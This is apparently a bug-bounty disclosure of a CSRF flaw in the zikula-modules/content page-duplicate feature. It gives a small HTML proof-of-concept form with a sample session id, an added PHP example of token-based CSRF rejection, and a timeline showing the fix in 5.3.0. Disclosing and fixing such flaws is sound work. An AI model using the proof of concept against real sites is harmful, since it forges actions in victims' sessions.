Cross-Site Request Forgery (CSRF) in zikula-modules/content


Reported on Dec 27th 2021


There is no CSRF protection for the content page duplicate functionality.

Proof of Concept

<!DOCTYPE html>
<html>
<body>
<form method="GET" action="">
<input type="text" name="_zsid" value="aus942jl2kph2f9mrlc0520pmm">
<input type="submit" value="Send">
</form>
</body>
</html>



This vulnerability can be used to create many duplicates when malicious links are clicked.
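A server-side check that would reject the request shown in the proof of concept, as an added example that is not part of the original report or of the zikula-modules/content fix. The function names, the `_token` parameter, and the HMAC-based session-bound token are assumptions chosen for illustration.

```php
<?php
// Added illustration, not code from zikula-modules/content or its fix commit.
// All function and parameter names here are hypothetical.

/** Derive a CSRF token bound to one server-side session and one action. */
function csrfTokenFor(string $sessionId, string $action, string $secret): string
{
    return hash_hmac('sha256', $sessionId . '|' . $action, $secret);
}

/** Decide whether a "duplicate page" request may proceed. Returns [allowed, reason]. */
function mayDuplicate(string $method, array $params, string $sessionId, string $secret): array
{
    // State-changing actions must not be reachable through GET:
    // following a link is enough to issue a GET with the session cookie attached.
    if (strtoupper($method) !== 'POST') {
        return [false, 'method not allowed'];
    }
    // The browser attaches the session cookie automatically, so the session
    // alone proves nothing about intent; a separate token is required.
    $sent = $params['_token'] ?? '';
    if (!is_string($sent) || $sent === '') {
        return [false, 'missing CSRF token'];
    }
    // Constant-time comparison against the token expected for this session.
    if (!hash_equals(csrfTokenFor($sessionId, 'duplicate', $secret), $sent)) {
        return [false, 'invalid CSRF token'];
    }
    return [true, 'ok'];
}

// Constructed sample values for the demonstration.
$secret  = bin2hex(random_bytes(32));
$session = 'constructed-session-id';

$requests = [
    'GET without token (shape of the PoC)' => ['GET', []],
    'POST without token'                   => ['POST', []],
    'POST with token of another session'   => ['POST', ['_token' => csrfTokenFor('other-session', 'duplicate', $secret)]],
    'POST with valid token'                => ['POST', ['_token' => csrfTokenFor($session, 'duplicate', $secret)]],
];

foreach ($requests as $label => [$method, $params]) {
    [$ok, $reason] = mayDuplicate($method, $params, $session, $secret);
    printf("%-38s => %s (%s)\n", $label, $ok ? 'allowed' : 'rejected', $reason);
}
```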

We are processing your report and will contact the zikula-modules/content team within 24 hours. (2 years ago)
We have contacted a member of the zikula-modules/content team and are waiting to hear back. (2 years ago)
Axel Guckelsberger validated this vulnerability. (2 years ago)
Asura-N has been awarded the disclosure bounty
The fix bounty is now up for grabs
Axel Guckelsberger marked this as fixed in 5.3.0 with commit 5e9bb4. (2 years ago)
The fix bounty has been dropped
This vulnerability will not receive a CVE